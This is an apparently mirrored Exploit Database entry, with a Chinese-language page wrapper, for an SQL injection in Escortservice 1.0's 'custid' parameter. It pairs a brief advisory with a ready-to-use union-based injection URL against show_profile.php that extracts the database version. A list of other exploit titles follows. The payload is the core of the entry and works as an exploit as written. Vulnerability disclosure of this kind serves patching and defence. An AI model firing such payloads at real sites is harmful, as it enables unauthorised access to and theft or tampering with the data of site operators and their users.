Escortservice 1.0 – ‘custid’ SQL Injection

Exploit Database
48 阅读

作者： NoNameMT

日期： 2011-02-07
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/35315/

source: https://www.securityfocus.com/bid/46171/info

Escortservice is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.

A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.

Escortservice 1.0 is vulnerable; other versions may also be affected. 

http://www.example.com/show_profile.php?custid=1+and+1=0+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66--+

last Exploits
Escortservice 1.0 – ‘custid’ SQL Injection的更多信息

Joomla! Component user_id com_sqlreport – Blind SQL Injection：
Zen Time Tracking 2.2 – Multiple SQL Injections：
Odine Solutions GateKeeper 1.0 – ‘trafficCycle’ SQL Injection：
CLScript.com Classifieds Software – SQL Injection：
Wowza Streaming Engine 4.5.0 – Multiple Cross-Site Scripting Vulnerabilities：
Joomla! 1.0.x – ‘ordering’ Cross-Site Scripting：
vbbuletin 4.0.4 – Multiple Vulnerabilities：
GeoVision Geowebserver 5.3.3 – Local FIle Inclusion：